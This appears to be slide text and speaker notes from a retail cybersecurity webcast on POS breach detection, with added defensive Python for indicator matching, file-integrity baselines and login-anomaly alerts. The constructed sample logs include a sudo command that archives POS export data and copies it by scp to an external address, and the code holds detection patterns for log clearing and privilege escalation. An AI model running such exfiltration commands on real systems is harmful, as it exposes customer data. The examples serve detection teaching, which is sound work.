Retail data breaches can have a serious impact on profitability, and the costs of a cybersecurity incident can reach the C-suite as well as consumer trust.
Tripwire’s chief technology officer Dwayne Melançon (@ThatDwayne) and vice president of security products at IDC Charles Kolodgy (@ckolodgy_idc) discuss the current retail cyber threat landscape, with a focus on strategies to mitigate cybersecurity risk and reduce the cost of potential security breaches, including:
- How to identify the early stages of a data breach
- Why point-of-sale and other business-critical systems require a different approach to data security
- How retailers can use the Top 20 Critical Security Controls to make their businesses ‘unattractive’ to cybercriminals
- Qualified attendees earn one CPE credit for participating in this webcast
A recording of the webcast that accompanies this slide deck can be found here: http://www.tripwire.com/register/retail-security-closing-the-threat-gap/
25. The Retail Security Challenge
• Retailers are prime targets for cybercriminals
• Defensive measures to stop cyber attacks are not enough
• Retailers need the capability to detect attacks early to minimize loss
• Customer trust and brand equity are at stake
31. Threat Detection Gap
• Are we prioritizing the high-risk breach alerts for critical assets amongst thousands of them?
• Are there other events of interest or risky changes to business-critical systems?
• Are these actionable, high-confidence alerts from my “trusted security source”?
• Are we able to drill down for root-cause analysis and forensics?
• Do we have threat intelligence to understand the nature and severity of the breach alerts?
DETECTION GAP
32. Threat Response Gap
• What are all the affected systems: POS, servers, network devices, operating systems, databases, file systems, desktops, etc.?
• What changed?
• When?
• By whom - authorized/unauthorized?
• What systems can we trust and what systems are compromised?
• Do we have control? Can we revert to the “good” baseline?
• Do we have policies, resources and tools to revert to a trusted production state?
RESPONSE GAP
33. Threat Prevention Gap
• Do we have full coverage?
• Do we know which are our most business-critical assets?
• Secure management sponsorship and set key system integrity indicators
• Is our continuous monitoring and threat detection process reducing our threat gaps?
• Finally, evolve to new best security practices for our context: industry, region, size, type, legal requirements, etc.
PREVENTION GAP
38. Cyber Attackers - Activity | Threat Indicator
Account credentials created outside standard processes | Active Directory changes; local admin accounts
Malware injected on POS system | File system change; traffic to C&C server
Credit card data skimmed from memory and written to a temporary file | File system change
Credit card data moved to exfiltration server | Unusual network activity; rogue services running on server
An unauthorized device accesses the network | Rogue device detected; unusual network activity
Man-in-the-middle attack | ARP cache poisoning
Hiding tracks / obscuring evidence | Logging disabled; log data altered
Hiding data from traditional tools | Data in alternate data streams
Elevation of privileges, obscuring identity | Use of su / sudo to change user accounts
Inbound exploit destined for a vulnerable system | Traffic with known payload; vulnerability present on target system
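The table above maps attacker activity to the indicators a monitoring tool can observe. As an added example, not code from the webcast or from Tripwire's products, the Python below turns a handful of those indicator rows into matching rules, runs them over a few constructed log lines, and ranks hosts by how many distinct indicators they show, weighting hosts that appear on an assumed critical-asset list. That ranking is the "prioritize the high-risk alerts for critical assets" question from the detection-gap slide. Hosts, users, addresses, the event layout and the byte threshold are all assumptions; the Windows event IDs 4720, 4732 and 1102 are the standard Security log IDs for "user account created", "member added to a local group" and "audit log cleared".

```python
import re
from collections import defaultdict

# Hosts the business has tagged as critical (an assumed inventory for this example).
CRITICAL_HOSTS = {"pos-0142", "fileshare-03"}

# Assumed threshold for what counts as "unusual" outbound volume from one host.
LARGE_TRANSFER_BYTES = 100 * 1024 * 1024

# Each rule ties a text pattern in an event to one "Threat Indicator" from the slide.
RULES = [
    ("Local admin account",      re.compile(r"EventID=4720\b|EventID=4732\b.*\bGroup=Administrators\b")),
    ("File system change",       re.compile(r"\bfim CHANGE\b")),
    ("Logging disabled",         re.compile(r"EventID=1102\b|\bauditd state=stopped\b")),
    ("Use of su / sudo",         re.compile(r"\bsudo\b.*\bUSER=root\b|\bsu\[\d+\]: .*session opened")),
    ("Unusual network activity", re.compile(r"\bnetflow\b.*\bbytes=(\d+)")),
]

# Constructed sample events in a "<timestamp> <host> <source> <details>" layout.
# These are not real logs; hosts, users and addresses are made up.
SAMPLE_EVENTS = [
    "2014-03-02T01:12:05 pos-0142 winsec EventID=4720 Subject=svc_backup Target=support2 Msg='A user account was created'",
    "2014-03-02T01:12:07 pos-0142 winsec EventID=4732 Subject=svc_backup Member=support2 Group=Administrators",
    "2014-03-02T01:14:30 pos-0142 fim CHANGE path=C:\\Windows\\System32\\svchost32.exe action=ADDED",
    "2014-03-02T01:14:31 pos-0142 fim CHANGE path=C:\\Windows\\Temp\\track.tmp action=MODIFIED",
    "2014-03-02T01:15:00 pos-0142 winsec EventID=1102 Subject=svc_backup Msg='The audit log was cleared'",
    "2014-03-02T01:20:10 fileshare-03 sshd Accepted password for svc_backup from 10.20.30.77 port 51234",
    "2014-03-02T01:20:15 fileshare-03 sudo svc_backup : TTY=pts/0 ; PWD=/home/svc_backup ; USER=root ; COMMAND=/bin/bash",
    "2014-03-02T01:21:00 fileshare-03 kernel audit: service=auditd state=stopped",
    "2014-03-02T02:00:00 fileshare-03 netflow src=10.20.30.5 dst=198.51.100.23 dport=443 bytes=734003200",
    "2014-03-02T09:00:00 pos-0142 winsec EventID=4624 Subject=cashier07 LogonType=2",
    "2014-03-02T09:05:00 hr-desk-12 netflow src=10.9.9.9 dst=203.0.113.5 dport=443 bytes=5120",
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<rest>.*)$")


def parse(line):
    """Split one event into timestamp, host and the remaining detail text."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def match_indicators(event):
    """Return the names of every indicator rule the event satisfies."""
    hits = []
    for name, rx in RULES:
        m = rx.search(event["rest"])
        if not m:
            continue
        # The network rule only counts when the transfer is large enough to be unusual.
        if name == "Unusual network activity" and int(m.group(1)) < LARGE_TRANSFER_BYTES:
            continue
        hits.append(name)
    return hits


def detect(lines):
    """Run all indicator rules over raw lines; one finding per (event, indicator)."""
    findings = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        for ind in match_indicators(ev):
            findings.append({"ts": ev["ts"], "host": ev["host"], "indicator": ind, "event": line})
    return findings


def prioritize(findings, critical=CRITICAL_HOSTS):
    """Rank hosts: distinct indicators seen, doubled for business-critical assets."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f["host"]].add(f["indicator"])
    ranked = [(len(inds) * (2 if host in critical else 1), host, sorted(inds))
              for host, inds in by_host.items()]
    ranked.sort(reverse=True)
    return ranked


if __name__ == "__main__":
    for score, host, inds in prioritize(detect(SAMPLE_EVENTS)):
        print(f"{score:>2} {host:<14} {', '.join(inds)}")
```

A single indicator (one file change, one sudo) is routine on most hosts; what makes the two critical hosts stand out is several different indicators from the same table landing on the same machine within minutes, which is the "actionable, high-confidence" signal the detection-gap slide asks for.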
53. DETECTION GAP / RESPONSE GAP / PREVENTION GAP
• Discover & profile all IT infrastructure
• Minimize vulnerabilities and harden configurations to reduce threat surface
• Real-time detection of suspicious behavior
• Forward events of interest to focus and enrich analysis & correlation
• Prioritize based on business context
• Identify compromise by comparison against baseline
• Support forensic & incident response
Copyright IDC. Reproduction is forbidden unless authorized. All rights reserved.
Attacks opportunistic
DELIVERING CYBERTHREAT SECURITY FOR CRITICAL SYSTEMS
TO DETECT, PREVENT AND RESPOND TO ENTERPRISE THREATS
Retailers are prime targets for cybercriminals because of the opportunity to steal your customers’ personal and financial data; POS intrusions were the number one type of breach in the past three years.
Defensive measures to stop cyber attacks from penetrating the network are not enough; the assumption needs to be that you will be breached, it is just a matter of when.
Retailers must deploy a layered approach to security, including network perimeter security, anti-malware and endpoint security for business-critical servers, POS endpoints and desktops.
Focus must be on detective capability early in the attack life cycle.
Retailers need answers to these questions, quickly:
How do I know if I have been breached?
How can I detect a breach before significant loss has occurred?
How do I protect myself so that I am not an attractive cybercrime target?
How can I protect the customer data on my POS systems?
Are we continuously monitoring all our critical endpoints for early indicators of risk and breach activity?
How can I quickly contain my exposure in case of a breach?
------------
This is one of the biggest challenges enterprise security teams face today. Many times you have heard the phrase in security, “it’s not a matter of if you have been breached, but when”. I would like to add to that: it is also important to identify how long you have been exposed, or simply to be able to detect whether you have been breached in the first place.
The enterprise threat gap is a model that helps illustrate the amount of time that passes through three critical phases.
The detection gap is the amount of time it takes to discover an actual compromise and identify its scope.
The remediation gap is the time between that detection and the point at which the damage has been limited.
The preventive gap is the measure of time it takes to avoid repeated or similar attacks.
Transition: Let’s talk about the challenges in each of these phases in more detail.
This process allows you to answer three key questions for the business:
Have we been breached?
How bad is it?
Can we avoid this from happening again?
Do we have full coverage? Are we missing any critical events and alerts?
Can we directly watch for “risky changes” to critical system configs and files?
Are these actionable, high-confidence alerts from my “trusted security source”? (false positives and unproven-technology issues)
Can we compare current system state(s) with what we expect? ( beyond just alerts/logs )
Are we looking at breach info in real-time, without loss?
What systems can we trust and what systems are compromised?
Correlate system state information with other sources for greater accuracy
Rank findings and differences based on risk and value
Do we have policies, resources and tools to revert to a trusted production state?
Remove the suspicious or known malicious assets
Remove or reduce access to production systems
Change all production credentials
Freeze changes, except by core-threat team
Finally, Revert to a trusted production state
Recreate systems from trusted sources
Harden the systems to prevent re-infection or repeat compromises
Should we assess our architecture and policies to reduce the opportunity for future compromise?
Establish Policies and Processes – security and configurations
Establish baseline and “Good Configuration”
Establish hardened security configurations
Secure management sponsorship and key system integrity indicators
Establish “security metrics” that indicate the health of the systems and networks...
At department, asset class and location level, in words that the C-level understands
Is our continuous monitoring and threat detection process effective?
Anchor to a known, trusted standard
Detect variance early
Isolate and mitigate incidents before loss occurs
Understand patterns to better detect anomalies
Shorten time to detection
Diagnose efficiently & effectively
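Several of the notes above come back to the same mechanism: compare current system state with what you expect, know what changed and when, and anchor to a trusted baseline you can revert to. The following Python is an added illustration of that idea, not Tripwire's own code. It records a SHA-256 hash, size and permission bits for every regular file under a directory, saves that as the baseline, and later reports what was added, removed or modified. The directory tree, file contents and the simulated attacker changes are constructed for the example; the paths are made up.

```python
import hashlib
import json
import os
import stat
import tempfile

# Attributes compared per file. Hash catches content swaps the size does not reveal.
TRACKED = ("sha256", "size", "mode")


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Record hash, size and permission bits of every regular file under root."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks and special files are out of scope for this example
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            state[rel] = {"sha256": _sha256(full), "size": st.st_size,
                          "mode": stat.S_IMODE(st.st_mode)}
    return state


def save_baseline(state, path):
    """Persist the trusted baseline; in practice this lives off-host, write-protected."""
    with open(path, "w") as f:
        json.dump(state, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Return what was added, removed or modified relative to the trusted baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = {}
    for rel in sorted(set(baseline) & set(current)):
        changed = [k for k in TRACKED if baseline[rel][k] != current[rel][k]]
        if changed:
            modified[rel] = changed
    return {"added": added, "removed": removed, "modified": modified}


def _write(root, rel, data):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(data)


def demo():
    """Build a constructed POS-like tree, baseline it, simulate an intrusion, diff."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        _write(root, "bin/pos.exe", b"known-good POS binary")
        _write(root, "etc/pos.conf", b"upload_host=pos-gw.internal\n")
        _write(root, "logs/audit.log", b"2014-03-01 cashier07 logon\n")
        _write(root, "logs/audit.log.1", b"older audit data\n")
        baseline_path = os.path.join(store, "baseline.json")
        save_baseline(snapshot(root), baseline_path)

        # Simulated attacker activity from the indicator table: drop malware, replace
        # the POS binary with one of identical size, redirect exports, and hide tracks
        # by truncating the current log and deleting the rotated one.
        _write(root, "bin/svchost32.exe", b"memory scraper")
        _write(root, "bin/pos.exe", b"trojanised POS binary")
        _write(root, "etc/pos.conf", b"upload_host=198.51.100.23\n")
        _write(root, "logs/audit.log", b"")
        os.remove(os.path.join(root, "logs", "audit.log.1"))

        return compare(load_baseline(baseline_path), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The replaced POS binary has the same size as the original, so a size-only or timestamp-only check would miss it; the hash does not. The baseline is written to a separate location on purpose: a baseline stored on the monitored host is one more file the attacker can alter when "hiding tracks".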
Full text:
Detecting an attack in the Recon and W&D (weaponization and delivery) phases is very difficult because attackers have become very good at camouflaging themselves as legitimate traffic.
Various types of anti-malware products may be able to detect a breach during the Malicious Action phase, but this is most often late in the attack cycle, after a loss has occurred.
The opportunity for detection is highest during the Exploitation phase, when the attacker is making repeated changes to the host/endpoint file system.
Early breach detection requires continuous monitoring of all business-critical systems, including servers, network devices, POS systems and desktops.
Monitoring desktops alone is not sufficient; focus should also be on systems that contain critical assets like customer data, including in the data center.
An example of a critical desktop would be that of any system administrator who has user-admin access.
Example: monitoring user IDs/logins to look for anomalies
o Ex: a user logs into a server that they have never accessed; TE & TLC (Tripwire Enterprise and Tripwire Log Center) could detect this and then also monitor exactly what that user did, to diagnose whether this is indeed a breach or needs investigation.
· Tie POS to the bigger threat picture (correlating changes on a POS system with corporate servers)
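The login-anomaly example in the note above, worked through as added illustrative Python rather than anything from TE or TLC: it builds a per-user baseline of which hosts each user has previously logged into from a constructed history of sshd "Accepted" lines, flags a login to a host that user has never touched, and gathers the sudo commands that user then ran on that host, so the analyst sees what the user did and not just that the login happened. All hosts, users, addresses, commands and the log lines themselves are made up for the example.

```python
import re
from collections import defaultdict

# Syslog-style sshd and sudo lines (format assumed for the example).
LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Accepted \S+ for (?P<user>\S+) from (?P<src>\S+)")
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sudo: +(?P<user>\S+) : .*COMMAND=(?P<cmd>.*)$")

# Constructed history (not real logs): the "normal" user-to-host pairs of the last month.
HISTORY = [
    "Feb  3 08:01:00 db-01 sshd[1201]: Accepted publickey for alice from 10.1.1.5 port 5022 ssh2",
    "Feb  5 09:12:00 db-02 sshd[1340]: Accepted publickey for alice from 10.1.1.5 port 5031 ssh2",
    "Feb  7 14:20:00 web-01 sshd[2010]: Accepted publickey for bob from 10.1.1.9 port 6011 ssh2",
    "Feb 10 02:00:00 backup-01 sshd[3300]: Accepted publickey for svc_backup from 10.20.30.5 port 7001 ssh2",
    "Feb 17 02:00:00 backup-01 sshd[3412]: Accepted publickey for svc_backup from 10.20.30.5 port 7002 ssh2",
    "Feb 24 08:05:00 db-01 sshd[1555]: Accepted publickey for alice from 10.1.1.5 port 5040 ssh2",
]

# Constructed events for the day under review.
TODAY = [
    "Mar  2 01:20:10 fileshare-03 sshd[2201]: Accepted password for svc_backup from 10.20.30.77 port 51234 ssh2",
    "Mar  2 01:20:15 fileshare-03 sudo:   svc_backup : TTY=pts/0 ; PWD=/home/svc_backup ; USER=root ; COMMAND=/bin/tar czf /tmp/.x.tgz /srv/pos/exports",
    "Mar  2 01:21:02 fileshare-03 sudo:   svc_backup : TTY=pts/0 ; PWD=/home/svc_backup ; USER=root ; COMMAND=/usr/bin/scp /tmp/.x.tgz 198.51.100.23:/tmp/",
    "Mar  2 08:30:00 db-01 sshd[2300]: Accepted publickey for alice from 10.1.1.5 port 5022 ssh2",
    "Mar  2 08:31:00 db-01 sudo:   alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/systemctl restart postgresql",
]


def build_baseline(lines):
    """Map each user to the set of hosts they have successfully logged into before."""
    seen = defaultdict(set)
    for line in lines:
        m = LOGIN_RE.match(line)
        if m:
            seen[m["user"]].add(m["host"])
    return seen


def first_seen_logins(lines, baseline):
    """Flag logins to a host the user has never accessed, with what they did next."""
    alerts = []
    for i, line in enumerate(lines):
        m = LOGIN_RE.match(line)
        if not m:
            continue
        user, host = m["user"], m["host"]
        if host in baseline.get(user, set()):
            continue  # known user-to-host pair, nothing to raise
        # Capture the privileged commands this user ran on that host after the login,
        # so the analyst can judge breach versus legitimate change.
        commands = []
        for later in lines[i + 1:]:
            s = SUDO_RE.match(later)
            if s and s["user"] == user and s["host"] == host:
                commands.append(s["cmd"])
        alerts.append({"ts": m["ts"], "user": user, "host": host, "src": m["src"],
                       "commands": commands})
    return alerts


if __name__ == "__main__":
    for a in first_seen_logins(TODAY, build_baseline(HISTORY)):
        print(f"{a['ts']} {a['user']}@{a['host']} from {a['src']} (first time on this host)")
        for cmd in a["commands"]:
            print("    ran:", cmd)
```

Note what makes the flagged event worth an analyst's time: a service account that normally only reaches the backup host appears on a file server with a password rather than a key, from a new source address, and the first things it does as root are to archive the POS export directory and copy it to an external address. The alice login on db-01 is in her baseline and is not raised, which is what keeps the alert volume manageable.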
Tripwire’s core competency is collecting data; the challenge is that humans cannot deal with the volume.
Driving effective security and compliance is done on top of a bed of real system state intelligence.
Driven by VM: the big change is that a VM assessment can be run instantly.
85% of attacks result from known vulnerabilities